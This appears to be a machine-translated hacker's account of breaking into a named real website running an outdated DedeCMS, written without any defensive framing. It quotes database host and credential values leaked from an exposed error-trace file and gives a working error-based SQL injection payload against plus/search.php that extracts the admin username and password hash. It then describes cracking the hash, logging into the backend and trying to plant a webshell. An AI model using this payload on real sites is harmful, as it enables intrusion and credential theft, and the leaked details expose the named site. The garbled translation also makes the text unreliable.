First, the website's main site has a feedback. Then I inserted the code at will. However. The dedecms page is displayed after successful submission. Then I will know. It must have failed. Open data/admin/ver.txt and find that the version is very old. Then test to open http://www.eyou.net/data/mysql_error_trace.inc . I was shocked. This is impossible. It still happens. There are not only backend addresses. 5b1__dbhost % 5D = 180.186.12.6 & _ COOKIE % 5 BGLOBALS % 5D % 5b1__dbuser % 5D = mysql & _ COOKIE % 5 BGLOBALS % 5D % 1_% 5D = qq1314520 & _ COOKIE % 5 BGLOBALS % 5D % 5b%_dbname % 5D = mysql & _ COOKIE % 5 BGLOBALS % 5D % 5b%_dbprefix % 5D = dede _ & nocache = true & QuickSearchBtn = % CC % E1 % BD % BB mysql generally in this case, it cannot be linked. So we will not do the test. Unless the "%" sign is enabled. However, this is basically impossible. It is easier to know the version and the background. Dedecms is very popular recently. Various injection bursts. Then I found a Code as follows: plus/search. php? Keyword = as & typeArr [111% 3D @ '\ '') + and + (SELECT + 1 + FROM + (select + count (*), concat (floor (rand (0) * 2), (substring (select + CONCAT (0x7c, userid, 0x7c, pwd) + from + '% 23 @__ admin' + limit + ))) a + from + information_schema.tables + group + by + a) B) % 23 @ '\ ''+] = a then Error infos occurs: duplicate entry '1 | admin | e41aa72de59c63006aad 'for key'group _ key' to output the first three post-md5 values. The password decrypted by CMD is 1111 aaaa or aaaa1111, which one I forgot. This is probably the case. Then log on to the background. When using webshell. The configuration file '/data/www_eyou_net/data/config. cache. inc. php' does not support writing and the system configuration parameters cannot be modified! The upload page is also deleted. Whether it is backup or not. Or submit any article. This is all true. So. I think it's okay. In case of an error, it is not good to delete the file. Below is the picture